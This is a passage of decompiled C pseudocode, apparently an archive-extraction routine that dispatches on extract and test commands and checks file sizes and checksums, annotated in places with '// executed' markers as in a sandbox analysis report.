				signed int _t577;
				signed int _t586;
				intOrPtr _t589;
				signed int _t592;
				signed int _t601;
				signed int _t608;
				signed int _t610;
				signed int _t611;
				signed int _t613;
				signed int _t631;
				signed int _t632;
				void* _t639;
				void* _t640;
				signed int _t656;
				signed int _t667;
				intOrPtr _t668;
				void* _t670;
				signed int _t671;
				signed int _t672;
				signed int _t673;
				signed int _t674;
				signed int _t675;
				signed int _t681;
				intOrPtr _t683;
				signed int _t688;
				intOrPtr _t690;
				signed int _t692;
				signed int _t696;
				void* _t698;
				signed int _t699;
				signed int _t702;
				signed int _t703;
				void* _t706;
				void* _t708;
				void* _t710;

				_t576 = __ecx;
				E0020D870(E002212F2, _t706);
				E0020D940();
				_t574 =  *((intOrPtr*)(_t706 + 8));
				_t665 = 0;
				_t683 = _t576;
				 *((intOrPtr*)(_t706 - 0x20)) = _t683;
				_t370 =  *( *(_t683 + 8) + 0x82f2) & 0x0000ffff;
				 *(_t706 - 0x18) = _t370;
				if( *(_t706 + 0xc) != 0) {
					L6:
					_t690 =  *((intOrPtr*)(_t574 + 0x21dc));
					__eflags = _t690 - 2;
					if(_t690 == 2) {
						 *(_t683 + 0x10f5) = _t665;
						__eflags =  *(_t574 + 0x32dc) - _t665;
						if(__eflags > 0) {
							L22:
							__eflags =  *(_t574 + 0x32e4) - _t665;
							if(__eflags > 0) {
								L26:
								_t577 =  *(_t683 + 8);
								__eflags =  *((intOrPtr*)(_t577 + 0x615c)) - _t665;
								if( *((intOrPtr*)(_t577 + 0x615c)) != _t665) {
									L29:
									 *(_t706 - 0x11) = _t665;
									_t35 = _t706 - 0x51a8; // -18856
									_t36 = _t706 - 0x11; // 0x7ef
									_t374 = E001F5C80(_t577, _t574 + 0x2280, _t36, 6, _t665, _t35, 0x800);
									__eflags = _t374;
									_t375 = _t374 & 0xffffff00 | _t374 != 0x00000000;
									 *(_t706 - 0x10) = _t375;
									__eflags = _t375;
									if(_t375 != 0) {
										__eflags =  *(_t706 - 0x11);
										if( *(_t706 - 0x11) == 0) {
											__eflags = 0;
											 *((char*)(_t683 + 0xf1)) = 0;
										}
									}
									E001F1F1B(_t574);
									_push(0x800);
									_t43 = _t706 - 0x113c; // -2364
									_push(_t574 + 0x22a8);
									E001FAFA3();
									__eflags =  *((char*)(_t574 + 0x3373));
									 *(_t706 - 0x1c) = 1;
									if( *((char*)(_t574 + 0x3373)) == 0) {
										_t380 = E001F2005(_t574);
										__eflags = _t380;
										if(_t380 == 0) {
											_t548 =  *(_t683 + 8);
											__eflags = 1 -  *((intOrPtr*)(_t548 + 0x72bc));
											asm("sbb al, al");
											_t61 = _t706 - 0x10;
											 *_t61 =  *(_t706 - 0x10) &  !_t548;
											__eflags =  *_t61;
										}
									} else {
										_t551 =  *( *(_t683 + 8) + 0x72bc);
										__eflags = _t551 - 1;
										if(_t551 != 1) {
											__eflags =  *(_t706 - 0x11);
											if( *(_t706 - 0x11) == 0) {
												__eflags = _t551;
												 *(_t706 - 0x10) =  *(_t706 - 0x10) & (_t551 & 0xffffff00 | _t551 == 0x00000000) - 0x00000001;
												_push(0);
												_t54 = _t706 - 0x113c; // -2364
												_t556 = E001FB8F2(_t54);
												_t656 =  *(_t683 + 8);
												__eflags =  *((intOrPtr*)(_t656 + 0x72bc)) - 1 - _t556;
												if( *((intOrPtr*)(_t656 + 0x72bc)) - 1 != _t556) {
													 *(_t706 - 0x10) = 0;
												} else {
													_t57 = _t706 - 0x113c; // -2364
													_push(1);
													E001FB8F2(_t57);
												}
											}
										}
									}
									 *((char*)(_t683 + 0x5f)) =  *((intOrPtr*)(_t574 + 0x3319));
									 *((char*)(_t683 + 0x60)) = 0;
									asm("sbb eax, [ebx+0x32dc]");
									 *((intOrPtr*)( *_t574 + 0x10))( *((intOrPtr*)(_t574 + 0x6ca8)) -  *(_t574 + 0x32d8),  *((intOrPtr*)(_t574 + 0x6cac)), 0);
									_t667 = 0;
									_t385 = 0;
									 *(_t706 + 0xb) = 0;
									 *(_t706 + 0xc) = 0;
									__eflags =  *(_t706 - 0x10);
									if( *(_t706 - 0x10) != 0) {
										L43:
										_t692 =  *(_t706 - 0x18);
										_t586 =  *((intOrPtr*)( *(_t683 + 8) + 0x61f9));
										_t387 = 0x49;
										__eflags = _t586;
										if(_t586 == 0) {
											L45:
											_t388 = _t667;
											L46:
											__eflags = _t586;
											_t82 = _t706 - 0x113c; // -2364
											_t392 = E00200FD9(_t586, _t82, (_t388 & 0xffffff00 | _t586 == 0x00000000) & 0x000000ff, _t388,  *(_t706 + 0xc)); // executed
											__eflags = _t392;
											if(__eflags == 0) {
												L219:
												_t393 = 0;
												L16:
												L17:
												 *[fs:0x0] =  *((intOrPtr*)(_t706 - 0xc));
												return _t393;
											}
											 *((intOrPtr*)(_t706 - 0x38)) = _t683 + 0x10f6;
											_t85 = _t706 - 0x113c; // -2364
											E001F80B1(_t683, __eflags, _t574, _t85, _t683 + 0x10f6, 0x800);
											__eflags =  *(_t706 + 0xb);
											if( *(_t706 + 0xb) != 0) {
												L50:
												 *(_t706 + 0xf) = 0;
												L51:
												_t398 =  *(_t683 + 8);
												_t589 = 0x45;
												__eflags =  *((char*)(_t398 + 0x6153));
												_t668 = 0x58;
												 *((intOrPtr*)(_t706 - 0x34)) = _t589;
												 *((intOrPtr*)(_t706 - 0x30)) = _t668;
												if( *((char*)(_t398 + 0x6153)) != 0) {
													L53:
													__eflags = _t692 - _t589;
													if(_t692 == _t589) {
														L55:
														_t96 = _t706 - 0x31a8; // -10664
														E001F6EF9(_t96);
														_push(0);
														_t97 = _t706 - 0x31a8; // -10664
														_t403 = E001FA1B1(_t96, _t668, __eflags, _t683 + 0x10f6, _t97);
														__eflags = _t403;
														if(_t403 == 0) {
															_t404 =  *(_t683 + 8);
															__eflags =  *((char*)(_t404 + 0x6153));
															_t108 = _t706 + 0xf;
															 *_t108 =  *(_t706 + 0xf) & (_t404 & 0xffffff00 |  *((char*)(_t404 + 0x6153)) != 0x00000000) - 0x00000001;
															__eflags =  *_t108;
															L61:
															_t110 = _t706 - 0x113c; // -2364
															_t408 = E001F7BE2(_t110, _t574, _t110);
															__eflags = _t408;
															if(_t408 != 0) {
																while(1) {
																	__eflags =  *((char*)(_t574 + 0x331b));
																	if( *((char*)(_t574 + 0x331b)) == 0) {
																		goto L65;
																	}
																	_t115 = _t706 - 0x113c; // -2364
																	_t541 = E001F807D(_t683, _t574);
																	__eflags = _t541;
																	if(_t541 == 0) {
																		 *((char*)(_t683 + 0x20f6)) = 1;
																		goto L219;
																	}
																	L65:
																	_t117 = _t706 - 0x13c; // 0x6c4
																	_t592 = 0x40;
																	memcpy(_t117,  *(_t683 + 8) + 0x5024, _t592 << 2);
																	_t710 = _t708 + 0xc;
																	asm("movsw");
																	_t120 = _t706 - 0x2c; // 0x7d4
																	_t683 =  *((intOrPtr*)(_t706 - 0x20));
																	 *(_t706 - 4) = 0;
																	asm("sbb ecx, ecx");
																	_t127 = _t706 - 0x13c; // 0x6c4
																	E001FC634(_t683 + 0x10, 0,  *((intOrPtr*)(_t574 + 0x331c)), _t127,  ~( *(_t574 + 0x3320) & 0x000000ff) & _t574 + 0x00003321, _t574 + 0x3331,  *((intOrPtr*)(_t574 + 0x336c)), _t574 + 0x334b, _t120);
																	__eflags =  *((char*)(_t574 + 0x331b));
																	if( *((char*)(_t574 + 0x331b)) == 0) {
																		L73:
																		 *(_t706 - 4) =  *(_t706 - 4) | 0xffffffff;
																		_t146 = _t706 - 0x13c; // 0x6c4
																		L001FE724(_t146);
																		_t147 = _t706 - 0x2160; // -6496
																		E001F943C(_t147);
																		_t418 =  *(_t574 + 0x3380);
																		 *(_t706 - 4) = 1;
																		 *(_t706 - 0x24) = _t418;
																		_t670 = 0x50;
																		__eflags = _t418;
																		if(_t418 == 0) {
																			L83:
																			_t419 = E001F2005(_t574);
																			__eflags = _t419;
																			if(_t419 == 0) {
																				_t601 =  *(_t706 + 0xf);
																				__eflags = _t601;
																				if(_t601 == 0) {
																					_t696 =  *(_t706 - 0x18);
																					L96:
																					__eflags =  *((char*)(_t574 + 0x6cb4));
																					if( *((char*)(_t574 + 0x6cb4)) == 0) {
																						__eflags = _t601;
																						if(_t601 == 0) {
																							L212:
																							 *(_t706 - 4) =  *(_t706 - 4) | 0xffffffff;
																							_t358 = _t706 - 0x2160; // -6496
																							E001F946E(_t358);
																							__eflags =  *(_t706 - 0x10);
																							_t385 =  *(_t706 + 0xf);
																							_t671 =  *(_t706 + 0xb);
																							if( *(_t706 - 0x10) != 0) {
																								_t362 = _t683 + 0xec;
																								 *_t362 =  *(_t683 + 0xec) + 1;
																								__eflags =  *_t362;
																							}
																							L214:
																							__eflags =  *((char*)(_t683 + 0x60));
																							if( *((char*)(_t683 + 0x60)) != 0) {
																								goto L219;
																							}
																							__eflags = _t385;
																							if(_t385 != 0) {
																								L15:
																								_t393 = 1;
																								goto L16;
																							}
																							__eflags =  *((intOrPtr*)(_t574 + 0x6cb4)) - _t385;
																							if( *((intOrPtr*)(_t574 + 0x6cb4)) != _t385) {
																								__eflags = _t671;
																								if(_t671 != 0) {
																									goto L15;
																								}
																								goto L219;
																							}
																							L217:
																							E001F1E3B(_t574);
																							goto L15;
																						}
																						L101:
																						_t422 =  *(_t683 + 8);
																						__eflags =  *((char*)(_t422 + 0x61f9));
																						if( *((char*)(_t422 + 0x61f9)) == 0) {
																							L103:
																							_t423 =  *(_t706 + 0xb);
																							__eflags = _t423;
																							if(_t423 != 0) {
																								L108:
																								 *((char*)(_t706 - 0xf)) = 1;
																								__eflags = _t423;
																								if(_t423 != 0) {
																									L110:
																									 *((intOrPtr*)(_t683 + 0xe8)) =  *((intOrPtr*)(_t683 + 0xe8)) + 1;
																									 *((intOrPtr*)(_t683 + 0x80)) = 0;
																									 *((intOrPtr*)(_t683 + 0x84)) = 0;
																									 *((intOrPtr*)(_t683 + 0x88)) = 0;
																									 *((intOrPtr*)(_t683 + 0x8c)) = 0;
																									E001FA728(_t683 + 0xc8, _t670,  *((intOrPtr*)(_t574 + 0x32f0)),  *((intOrPtr*)( *(_t683 + 8) + 0x82d8)));
																									E001FA728(_t683 + 0xa0, _t670,  *((intOrPtr*)(_t574 + 0x32f0)),  *((intOrPtr*)( *(_t683 + 8) + 0x82d8)));
																									_t698 = _t683 + 0x10;
																									 *(_t683 + 0x30) =  *(_t574 + 0x32d8);
																									_t217 = _t706 - 0x2160; // -6496
																									 *(_t683 + 0x34) =  *(_t574 + 0x32dc);
																									E001FC67C(_t698, _t574, _t217);
																									_t672 =  *((intOrPtr*)(_t706 - 0xf));
																									_t608 = 0;
																									_t432 =  *(_t706 + 0xb);
																									 *((char*)(_t683 + 0x39)) = _t672;
																									 *((char*)(_t683 + 0x3a)) = _t432;
																									 *(_t706 - 0x1c) = 0;
																									 *(_t706 - 0x28) = 0;
																									__eflags = _t672;
																									if(_t672 != 0) {
																										L127:
																										_t673 =  *(_t683 + 8);
																										__eflags =  *((char*)(_t673 + 0x6198));
																										 *((char*)(_t706 - 0x214d)) =  *((char*)(_t673 + 0x6198)) == 0;
																										__eflags =  *((char*)(_t706 - 0xf));
																										if( *((char*)(_t706 - 0xf)) != 0) {
																											L131:
																											_t434 = 1;
																											__eflags = 1;
																											L132:
																											__eflags =  *(_t706 - 0x24);
																											 *((char*)(_t706 - 0xe)) = _t608;
																											 *((char*)(_t706 - 0x12)) = _t434;
																											 *((char*)(_t706 - 0xd)) = _t434;
																											if( *(_t706 - 0x24) == 0) {
																												__eflags =  *(_t574 + 0x3318);
																												if( *(_t574 + 0x3318) == 0) {
																													__eflags =  *((char*)(_t574 + 0x22a0));
																													if(__eflags != 0) {
																														E00202842(_t574,  *((intOrPtr*)(_t683 + 0xe0)), _t706,  *((intOrPtr*)(_t574 + 0x3374)),  *(_t574 + 0x3370) & 0x000000ff);
																														_t472 =  *((intOrPtr*)(_t683 + 0xe0));
																														 *(_t472 + 0x4c48) =  *(_t574 + 0x32e0);
																														__eflags = 0;
																														 *(_t472 + 0x4c4c) =  *(_t574 + 0x32e4);
																														 *((char*)(_t472 + 0x4c60)) = 0;
																														E002024D9( *((intOrPtr*)(_t683 + 0xe0)),  *((intOrPtr*)(_t574 + 0x229c)),  *(_t574 + 0x3370) & 0x000000ff); // executed
																													} else {
																														_push( *(_t574 + 0x32e4));
																														_push( *(_t574 + 0x32e0));
																														_push(_t698);
																														E001F910B(_t574, _t673, _t683, __eflags);
																													}
																												}
																												L163:
																												E001F1E3B(_t574);
																												__eflags =  *((char*)(_t574 + 0x3319));
																												if( *((char*)(_t574 + 0x3319)) != 0) {
																													L166:
																													_t436 = 0;
																													__eflags = 0;
																													_t610 = 0;
																													L167:
																													__eflags =  *(_t574 + 0x3370);
																													if( *(_t574 + 0x3370) != 0) {
																														__eflags =  *((char*)(_t574 + 0x22a0));
																														if( *((char*)(_t574 + 0x22a0)) == 0) {
																															L175:
																															__eflags =  *(_t706 + 0xb);
																															 *((char*)(_t706 - 0xe)) = _t436;
																															if( *(_t706 + 0xb) != 0) {
																																L185:
																																__eflags =  *(_t706 - 0x24);
																																_t674 =  *((intOrPtr*)(_t706 - 0xd));
																																if( *(_t706 - 0x24) == 0) {
																																	L189:
																																	_t611 = 0;
																																	__eflags = 0;
																																	L190:
																																	__eflags =  *((char*)(_t706 - 0xf));
																																	if( *((char*)(_t706 - 0xf)) != 0) {
																																		goto L212;
																																	}
																																	_t699 =  *(_t706 - 0x18);
																																	__eflags = _t699 -  *((intOrPtr*)(_t706 - 0x30));
																																	if(_t699 ==  *((intOrPtr*)(_t706 - 0x30))) {
																																		L193:
																																		__eflags =  *(_t706 - 0x24);
																																		if( *(_t706 - 0x24) == 0) {
																																			L197:
																																			__eflags = _t436;
																																			if(_t436 == 0) {
																																				L200:
																																				__eflags = _t611;
																																				if(_t611 != 0) {
																																					L208:
																																					_t437 =  *(_t683 + 8);
																																					__eflags =  *((char*)(_t437 + 0x61a0));
																																					if( *((char*)(_t437 + 0x61a0)) == 0) {
																																						_t700 = _t683 + 0x10f6;
																																						_t438 = E001FA12F(_t683 + 0x10f6,  *((intOrPtr*)(_t574 + 0x22a4))); // executed
																																						__eflags = _t438;
																																						if(__eflags == 0) {
																																							E001F6BF5(__eflags, 0x11, _t574 + 0x1e, _t700);
																																						}
																																					}
																																					 *(_t683 + 0x10f5) = 1;
																																					goto L212;
																																				}
																																				_t675 =  *(_t706 - 0x28);
																																				__eflags = _t675;
																																				_t613 =  *(_t706 - 0x1c);
																																				if(_t675 > 0) {
																																					L203:
																																					__eflags = _t436;
																																					if(_t436 != 0) {
																																						L206:
																																						_t331 = _t706 - 0x2160; // -6496
																																						E001F9BD6(_t331);
																																						L207:
																																						_t688 = _t574 + 0x32c0;
																																						asm("sbb eax, eax");
																																						asm("sbb ecx, ecx");
																																						asm("sbb eax, eax");
																																						_t339 = _t706 - 0x2160; // -6496
																																						E001F9A7E(_t339, _t574 + 0x32d0,  ~( *( *(_t683 + 8) + 0x72c8)) & _t688,  ~( *( *(_t683 + 8) + 0x72cc)) & _t574 + 0x000032c8,  ~( *( *(_t683 + 8) + 0x72d0)) & _t574 + 0x000032d0);
																																						_t340 = _t706 - 0x2160; // -6496
																																						E001F94DA(_t340);
																																						E001F7A12( *((intOrPtr*)(_t706 - 0x20)),  *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)), _t574,  *((intOrPtr*)(_t706 - 0x38)));
																																						asm("sbb eax, eax");
																																						asm("sbb eax, eax");
																																						__eflags =  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)) + 0x72c8)) & _t688;
																																						E001F9A7B( ~( *( *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)) + 0x72c8)) & _t688,  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)) + 0x72c8)) & _t688,  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)) + 0x72d0)) & _t574 + 0x000032d0);
																																						_t683 =  *((intOrPtr*)(_t706 - 0x20));
																																						goto L208;
																																					}
																																					__eflags =  *((intOrPtr*)(_t683 + 0x88)) - _t613;
																																					if( *((intOrPtr*)(_t683 + 0x88)) != _t613) {
																																						goto L206;
																																					}
																																					__eflags =  *((intOrPtr*)(_t683 + 0x8c)) - _t675;
																																					if( *((intOrPtr*)(_t683 + 0x8c)) == _t675) {
																																						goto L207;
																																					}
																																					goto L206;
																																				}
																																				__eflags = _t613;
																																				if(_t613 == 0) {
																																					goto L207;
																																				}
																																				goto L203;
																																			}
																																			_t460 =  *(_t683 + 8);
																																			__eflags =  *((char*)(_t460 + 0x6198));
																																			if( *((char*)(_t460 + 0x6198)) == 0) {
																																				goto L212;
																																			}
																																			_t436 =  *((intOrPtr*)(_t706 - 0xe));
																																			goto L200;
																																		}
																																		__eflags = _t611;
																																		if(_t611 != 0) {
																																			goto L197;
																																		}
																																		__eflags =  *(_t574 + 0x3380) - 5;
																																		if( *(_t574 + 0x3380) != 5) {
																																			goto L212;
																																		}
																																		__eflags = _t674;
																																		if(_t674 == 0) {
																																			goto L212;
																																		}
																																		goto L197;
																																	}
																																	__eflags = _t699 -  *((intOrPtr*)(_t706 - 0x34));
																																	if(_t699 !=  *((intOrPtr*)(_t706 - 0x34))) {
																																		goto L212;
																																	}
																																	goto L193;
																																}
																																__eflags =  *(_t574 + 0x3380) - 4;
																																if( *(_t574 + 0x3380) != 4) {
																																	goto L189;
																																}
																																__eflags = _t674;
																																if(_t674 == 0) {
																																	goto L189;
																																}
																																_t611 = 1;
																																goto L190;
																															}
																															__eflags =  *((char*)(_t706 - 0x12));
																															if( *((char*)(_t706 - 0x12)) == 0) {
																																goto L185;
																															}
																															__eflags = _t610;
																															if(_t610 != 0) {
																																goto L185;
																															}
																															__eflags =  *((intOrPtr*)(_t574 + 0x331b)) - _t610;
																															if(__eflags == 0) {
																																L183:
																																_t311 = _t706 - 0x113c; // -2364
																																_push(_t574 + 0x1e);
																																_push(3);
																																L184:
																																E001F6BF5(__eflags);
																																 *((char*)(_t706 - 0xe)) = 1;
																																E001F6E03(0x2300e0, 3);
																																_t436 =  *((intOrPtr*)(_t706 - 0xe));
																																goto L185;
																															}
																															__eflags =  *((intOrPtr*)(_t574 + 0x3341)) - _t610;
																															if( *((intOrPtr*)(_t574 + 0x3341)) == _t610) {
																																L181:
																																__eflags =  *((char*)(_t683 + 0xf3));
																																if(__eflags != 0) {
																																	goto L183;
																																}
																																_t309 = _t706 - 0x113c; // -2364
																																_push(_t574 + 0x1e);
																																_push(4);
																																goto L184;
																															}
																															__eflags =  *(_t574 + 0x6cc4) - _t610;
																															if(__eflags == 0) {
																																goto L183;
																															}
																															goto L181;
																														}
																														__eflags =  *(_t574 + 0x32e4) - _t436;
																														if(__eflags < 0) {
																															goto L175;
																														}
																														if(__eflags > 0) {
																															L173:
																															__eflags = _t610;
																															if(_t610 != 0) {
																																 *((char*)(_t683 + 0xf3)) = 1;
																															}
																															goto L175;
																														}
																														__eflags =  *(_t574 + 0x32e0) - _t436;
																														if( *(_t574 + 0x32e0) <= _t436) {
																															goto L175;
																														}
																														goto L173;
																													}
																													 *((char*)(_t683 + 0xf3)) = _t436;
																													goto L175;
																												}
																												asm("sbb edx, edx");
																												_t469 = E001FA6F6(_t683 + 0xc8, _t683, _t574 + 0x32f0,  ~( *(_t574 + 0x334a) & 0x000000ff) & _t574 + 0x0000334b);
																												__eflags = _t469;
																												if(_t469 == 0) {
																													goto L166;
																												}
																												_t610 = 1;
																												_t436 = 0;
																												goto L167;
																											}
																											_t702 =  *(_t574 + 0x3380);
																											__eflags = _t702 - 4;
																											if(__eflags == 0) {
																												L146:
																												_t262 = _t706 - 0x41a8; // -14760
																												E001F80B1(_t683, __eflags, _t574, _t574 + 0x3384, _t262, 0x800);
																												_t608 =  *((intOrPtr*)(_t706 - 0xe));
																												__eflags = _t608;
																												if(_t608 == 0) {
																													L153:
																													_t479 =  *((intOrPtr*)(_t706 - 0xd));
																													L154:
																													__eflags =  *((intOrPtr*)(_t574 + 0x6cb0)) - 2;
																													if( *((intOrPtr*)(_t574 + 0x6cb0)) != 2) {
																														L141:
																														__eflags = _t608;
																														if(_t608 == 0) {
																															L157:
																															_t480 = 0;
																															__eflags = 0;
																															L158:
																															 *(_t683 + 0x10f5) = _t480;
																															goto L163;
																														}
																														L142:
																														__eflags = _t479;
																														if(_t479 == 0) {
																															goto L157;
																														}
																														_t480 = 1;
																														goto L158;
																													}
																													__eflags = _t608;
																													if(_t608 != 0) {
																														goto L142;
																													}
																													L140:
																													 *((char*)(_t706 - 0x12)) = 0;
																													goto L141;
																												}
																												__eflags =  *((short*)(_t706 - 0x41a8));
																												if( *((short*)(_t706 - 0x41a8)) == 0) {
																													goto L153;
																												}
																												_t266 = _t706 - 0x41a8; // -14760
																												_push(0x800);
																												_push(_t683 + 0x10f6);
																												__eflags = _t702 - 4;
																												if(__eflags != 0) {
																													_push(_t574 + 0x1e);
																													_t269 = _t706 - 0x2160; // -6496
																													_t479 = E001F9049(_t673, __eflags);
																												} else {
																													_t479 = E001F74DD(_t608, __eflags);
																												}
																												L151:
																												 *((char*)(_t706 - 0xd)) = _t479;
																												__eflags = _t479;
																												if(_t479 == 0) {
																													L139:
																													_t608 =  *((intOrPtr*)(_t706 - 0xe));
																													goto L140;
																												}
																												_t608 =  *((intOrPtr*)(_t706 - 0xe));
																												goto L154;
																											}
																											__eflags = _t702 - 5;
																											if(__eflags == 0) {
																												goto L146;
																											}
																											__eflags = _t702 - _t434;
																											if(_t702 == _t434) {
																												L144:
																												__eflags = _t608;
																												if(_t608 == 0) {
																													goto L153;
																												}
																												_push(_t683 + 0x10f6);
																												_t479 = E001F774C(_t673, _t683 + 0x10, _t574);
																												goto L151;
																											}
																											__eflags = _t702 - 2;
																											if(_t702 == 2) {
																												goto L144;
																											}
																											__eflags = _t702 - 3;
																											if(__eflags == 0) {
																												goto L144;
																											}
																											E001F6BF5(__eflags, 0x47, _t574 + 0x1e, _t683 + 0x10f6);
																											__eflags = 0;
																											_t479 = 0;
																											 *((char*)(_t706 - 0xd)) = 0;
																											goto L139;
																										}
																										__eflags = _t432;
																										if(_t432 != 0) {
																											goto L131;
																										}
																										_t491 = 0x50;
																										__eflags =  *(_t706 - 0x18) - _t491;
																										if( *(_t706 - 0x18) == _t491) {
																											goto L131;
																										}
																										_t434 = 1;
																										_t608 = 1;
																										goto L132;
																									}
																									__eflags =  *(_t574 + 0x6cc4);
																									if( *(_t574 + 0x6cc4) != 0) {
																										goto L127;
																									}
																									_t703 =  *(_t574 + 0x32e4);
																									_t681 =  *(_t574 + 0x32e0);
																									__eflags = _t703;
																									if(__eflags < 0) {
																										L126:
																										_t698 = _t683 + 0x10;
																										goto L127;
																									}
																									if(__eflags > 0) {
																										L115:
																										_t631 =  *(_t574 + 0x32d8);
																										_t632 = _t631 << 0xa;
																										__eflags = ( *(_t574 + 0x32dc) << 0x00000020 | _t631) << 0xa - _t703;
																										if(__eflags < 0) {
																											L125:
																											_t432 =  *(_t706 + 0xb);
																											_t608 = 0;
																											__eflags = 0;
																											goto L126;
																										}
																										if(__eflags > 0) {
																											L118:
																											__eflags = _t703;
																											if(__eflags < 0) {
																												L124:
																												_t237 = _t706 - 0x2160; // -6496
																												E001F98D5(_t237,  *(_t574 + 0x32e0),  *(_t574 + 0x32e4));
																												 *(_t706 - 0x1c) =  *(_t574 + 0x32e0);
																												 *(_t706 - 0x28) =  *(_t574 + 0x32e4);
																												goto L125;
																											}
																											if(__eflags > 0) {
																												L121:
																												_t499 = E001F96E1(_t681);
																												__eflags = _t681 -  *(_t574 + 0x32dc);
																												if(__eflags < 0) {
																													goto L125;
																												}
																												if(__eflags > 0) {
																													goto L124;
																												}
																												__eflags = _t499 -  *(_t574 + 0x32d8);
																												if(_t499 <=  *(_t574 + 0x32d8)) {
																													goto L125;
																												}
																												goto L124;
																											}
																											__eflags = _t681 - 0x5f5e100;
																											if(_t681 < 0x5f5e100) {
																												goto L124;
																											}
																											goto L121;
																										}
																										__eflags = _t632 - _t681;
																										if(_t632 <= _t681) {
																											goto L125;
																										}
																										goto L118;
																									}
																									__eflags = _t681 - 0xf4240;
																									if(_t681 <= 0xf4240) {
																										goto L126;
																									}
																									goto L115;
																								}
																								L109:
																								_t198 = _t683 + 0xe4;
																								 *_t198 =  *(_t683 + 0xe4) + 1;
																								__eflags =  *_t198;
																								goto L110;
																							}
																							 *((char*)(_t706 - 0xf)) = 0;
																							_t501 = 0x50;
																							__eflags = _t696 - _t501;
																							if(_t696 != _t501) {
																								_t192 = _t706 - 0x2160; // -6496
																								__eflags = E001F9745(_t192);
																								if(__eflags != 0) {
																									E001F6BF5(__eflags, 0x3b, _t574 + 0x1e, _t683 + 0x10f6);
																									E001F6E9B(0x2300e0, _t706, _t574 + 0x1e, _t683 + 0x10f6);
																								}
																							}
																							goto L109;
																						}
																						 *(_t683 + 0x10f5) = 1;
																						__eflags =  *((char*)(_t422 + 0x61f9));
																						if( *((char*)(_t422 + 0x61f9)) != 0) {
																							_t423 =  *(_t706 + 0xb);
																							goto L108;
																						}
																						goto L103;
																					}
																					 *(_t706 + 0xb) = 1;
																					 *(_t706 + 0xf) = 1;
																					_t182 = _t706 - 0x113c; // -2364
																					_t511 = E00200FD9(_t601, _t182, 0, 0, 1);
																					__eflags = _t511;
																					if(_t511 != 0) {
																						goto L101;
																					}
																					__eflags = 0;
																					 *(_t706 - 0x1c) = 0;
																					L99:
																					_t184 = _t706 - 0x2160; // -6496
																					E001F946E(_t184);
																					_t393 =  *(_t706 - 0x1c);
																					goto L16;
																				}
																				_t174 = _t706 - 0x2160; // -6496
																				_push(_t574);
																				_t515 = E001F7F5F(_t683);
																				_t696 =  *(_t706 - 0x18);
																				_t601 = _t515;
																				 *(_t706 + 0xf) = _t601;
																				L93:
																				__eflags = _t601;
																				if(_t601 != 0) {
																					goto L101;
																				}
																				goto L96;
																			}
																			__eflags =  *(_t706 + 0xf);
																			if( *(_t706 + 0xf) != 0) {
																				_t516 =  *(_t706 - 0x18);
																				__eflags = _t516 - 0x50;
																				if(_t516 != 0x50) {
																					_t639 = 0x49;
																					__eflags = _t516 - _t639;
																					if(_t516 != _t639) {
																						_t640 = 0x45;
																						__eflags = _t516 - _t640;
																						if(_t516 != _t640) {
																							_t517 =  *(_t683 + 8);
																							__eflags =  *((intOrPtr*)(_t517 + 0x6158)) - 1;
																							if( *((intOrPtr*)(_t517 + 0x6158)) != 1) {
																								 *(_t683 + 0xe4) =  *(_t683 + 0xe4) + 1;
																								_t172 = _t706 - 0x113c; // -2364
																								_push(_t574);
																								E001F7D9B(_t683);
																							}
																						}
																					}
																				}
																			}
																			goto L99;
																		}
																		__eflags = _t418 - 5;
																		if(_t418 == 5) {
																			goto L83;
																		}
																		_t601 =  *(_t706 + 0xf);
																		_t696 =  *(_t706 - 0x18);
																		__eflags = _t601;
																		if(_t601 == 0) {
																			goto L96;
																		}
																		__eflags = _t696 - _t670;
																		if(_t696 == _t670) {
																			goto L93;
																		}
																		_t520 =  *(_t683 + 8);
																		__eflags =  *((char*)(_t520 + 0x61f9));
																		if( *((char*)(_t520 + 0x61f9)) != 0) {
																			goto L93;
																		}
																		 *((char*)(_t706 - 0xf)) = 0;
																		_t523 = E001F9E6B(_t683 + 0x10f6);
																		__eflags = _t523;
																		if(_t523 == 0) {
																			L81:
																			__eflags =  *((char*)(_t706 - 0xf));
																			if( *((char*)(_t706 - 0xf)) == 0) {
																				_t601 =  *(_t706 + 0xf);
																				goto L93;
																			}
																			L82:
																			_t601 = 0;
																			 *(_t706 + 0xf) = 0;
																			goto L93;
																		}
																		__eflags =  *((char*)(_t706 - 0xf));
																		if( *((char*)(_t706 - 0xf)) != 0) {
																			goto L82;
																		}
																		__eflags = 0;
																		_push(0);
																		_push(_t574 + 0x32c0);
																		_t160 = _t706 - 0xf; // 0x7f1
																		E001F919C(0,  *(_t683 + 8), 0, _t683 + 0x10f6, 0x800, _t160,  *(_t574 + 0x32e0),  *(_t574 + 0x32e4));
																		goto L81;
																	}
																	__eflags =  *((char*)(_t574 + 0x3341));
																	if( *((char*)(_t574 + 0x3341)) == 0) {
																		goto L73;
																	}
																	_t132 = _t706 - 0x2c; // 0x7d4
																	_t531 = E0020F3CA(_t574 + 0x3342, _t132, 8);
																	_t708 = _t710 + 0xc;
																	__eflags = _t531;
																	if(_t531 == 0) {
																		goto L73;
																	}
																	__eflags =  *(_t574 + 0x6cc4);
																	if( *(_t574 + 0x6cc4) != 0) {
																		goto L73;
																	}
																	__eflags =  *((char*)(_t683 + 0x10f4));
																	_t136 = _t706 - 0x113c; // -2364
																	_push(_t574 + 0x1e);
																	if(__eflags != 0) {
																		_push(6);
																		E001F6BF5(__eflags);
																		E001F6E03(0x2300e0, 0xb);
																		__eflags = 0;
																		 *(_t706 + 0xf) = 0;
																		goto L73;
																	}
																	_push(0x7d);
																	E001F6BF5(__eflags);
																	E001FE797( *(_t683 + 8) + 0x5024);
																	 *(_t706 - 4) =  *(_t706 - 4) | 0xffffffff;
																	_t141 = _t706 - 0x13c; // 0x6c4
																	L001FE724(_t141);
																}
															}
															E001F6E03(0x2300e0, 2);
															_t543 = E001F1E3B(_t574);
															__eflags =  *((char*)(_t574 + 0x6cb4));
															_t393 = _t543 & 0xffffff00 |  *((char*)(_t574 + 0x6cb4)) == 0x00000000;
															goto L16;
														}
														_t100 = _t706 - 0x2198; // -6552
														_t545 = E001F7BBB(_t100, _t574 + 0x32c0);
														__eflags = _t545;
														if(_t545 == 0) {
															goto L61;
														}
														__eflags =  *((char*)(_t706 - 0x219c));
